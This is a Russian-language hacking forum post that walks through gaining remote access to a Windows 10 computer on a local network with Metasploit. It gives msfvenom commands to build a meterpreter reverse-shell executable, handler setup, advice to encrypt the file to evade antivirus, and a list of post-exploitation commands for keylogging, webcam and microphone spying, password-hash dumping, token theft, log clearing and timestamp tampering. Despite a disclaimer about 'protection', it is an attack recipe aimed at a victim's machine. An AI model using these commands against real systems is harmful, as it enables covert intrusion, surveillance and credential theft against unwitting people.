DE-RASHER
Новичок
- Статус
- offline
- Регистрация
- 26.10.2019
- Сообщения
- 5
- Репутация
- 4
Я не побуждаю вас к незаконной деятельности
Я лишь рассказываю о том, как можно защититься
Я не несу ответственности за ваши поступки
Я лишь рассказываю о том, как можно защититься
Я не несу ответственности за ваши поступки
Получение удаленного доступа (по локально сети) к windows 10 | kali linux
Windows 10 - одна из самых распространенных операционных систем, у неё безусловно очень мощная защита,
но у всего есть свои уязвимости.
Хотя компьютер вирус и видит, но если хорошенько зашифровать exe файл, то можно добиться и более утонченного результата.
Сегодня же мы просто получим удаленный доступ (по локальной сети) к компьютеру с установленной системой windows 10.
Возможно, можно настроить и так чтобы это было глобально (хотя, я и догадываюсь, как это сделать),
но не сегодня.
Если получиться настроить удаленный доступ глобально, то я напишу новую статью, заточенную конкретно на это, с отсылками на данную запись.
Приступим!
Что нам понадобится:
1. Kali Linux (или любой другой дистрибутив linux, установленным metasploit)
2. Компьютер (на который мы будем кидать вирус)
3. И терпение!
Для начало проверь интернет соединение на первом и втором компьютере. Убедимся что оно есть (работает), и то, что оба устройства подключены к одной сети
Далее на устройстве с linux откроем терминал и прописываем следующую команду
Код:
ifconfig
в зависимости от вашего подключения смотрим на определенный абзац.
Если у вас wi-fi по кабелю (eth0), то ищем наш ip там,
если у вас беспроводное соединение (wlan0), то ip адрес ищем в абзаце с wlan0
*После inet*
ip адрес мы должны запомнить, или скопировать
Далее переходим в metasploit, для этого клацаем на картинку М в меню сбоку или в консоли прописываем
Код:
msfconsole
Далее вводим следующую команду:
Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=здесь вставляем ip -f exe -o здесь путь/файл.exe
Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o root/Desktop/file.exe
Далее перебрасываем файл на атакуемый компьютер
После этого возвращаемся к metasploit, и набираем следующее
Код:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
Код:
show options
Код:
set LHOST здесь ip
Код:
set LHOST 192.168.0.4
Код:
exploit -j -z
Ну а далее запускаем вирус на атакуемом компьютере
После опять возвращаемся к metasploit и пишем
Код:
session -i 1
Ну вот и все, мы попали в компьютер
Список команд и их значение:
Системные
Команда Описание
------- -----------
clearev - Очистить журнал событий
drop_token - Отбрасывает любой активный токен имперсонализации.
execute - Выполнить команду
getenv - Получить значение одной или более переменных окружения
getpid - Получить идентификатор текущего процесса
getprivs - Попытаться включить все привилегии, доступные для текущего процесса
getsid - Получение SID пользователя
getuid - Получение имени пользователя
kill - Завершить процесс
localtime - Показать локальную дату и время целевой системы
pgrep - Фильтрация процессов по имени
pkill - Завершить процесс по имени
ps - Список запущенных процессов
reboot - Перезагрузить удалённый компьютер
reg - Изменение и взаимодействие с удалённым регистром
rev2self - Вызов RevertToSelf() на удалённой машине
shell - Перейти в системную командную оболочку
shutdown - Отключить удалённый компьютер
steal_token - Попытаться украсть impersonation token из целевого процесса
suspend - Приостанавливает или возобновляет список процессов
sysinfo - Получает информацию об удалённой системе, такую как вид ОС
Команды пользовательского интерфейса
enumdesktops - Список всех доступных рабочих столов и оконных станцийgetdesktop - Получить текущий рабочий стол meterpreter
idletime - Возвращает количество секунд отсутствия активности удалённого пользователя
keyscan_dump - Дамп буфера нажатия клавиш
keyscan_start - Запустить захват нажатие клавиш
keyscan_stop - Остановить захват нажатия клавиш
screenshot - Получение скриншота интерактивного рабочего стола
setdesktop - Изменение текущего рабочего стола meterpreters
uictl - Контроль некоторых компонентов пользовательских интерфейсов
Команды для управления веб-камерой
Команда Описание------- -----------
record_mic - Запись аудио со стандартного микрофона в течение X секунд
webcam_chat - Начать видеочат
webcam_list - Вывести список веб-камер
webcam_snap - Сделать снимок указанной веб-камерой
webcam_stream - Запустить выдиопоток с выбранной веб-камеры
Команды вывода аудио:
1 2 3 | Команда Описание ------- ----------- play - воспроизвести аудио файл на целевой системе, на диск ничего не записывается |
Команды повышения привилегий:
1 2 3 | Команда Описание ------- ----------- getsystem - Пытается поднять ваши привилегии на данной локальной системе. |
Команда для работы с базой данных паролей:
1 2 3 | Команда Описание ------- ----------- hashdump - Дампит содержимое базы данных SAM |
Команды для работы с Timestomp (временными метками файла):
1 2 3 | Команда Описание ------- ----------- timestomp - Манипуляция файловыми атрибутами MACE |
У меня все, спасибо что прочитали?